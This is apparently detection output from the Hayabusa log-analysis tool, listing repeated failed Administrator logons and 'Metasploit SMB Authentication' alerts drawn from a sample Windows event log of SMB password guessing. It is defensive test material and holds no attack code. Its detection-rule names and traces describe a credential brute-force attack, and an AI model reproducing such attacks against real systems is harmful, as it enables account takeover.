SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: 
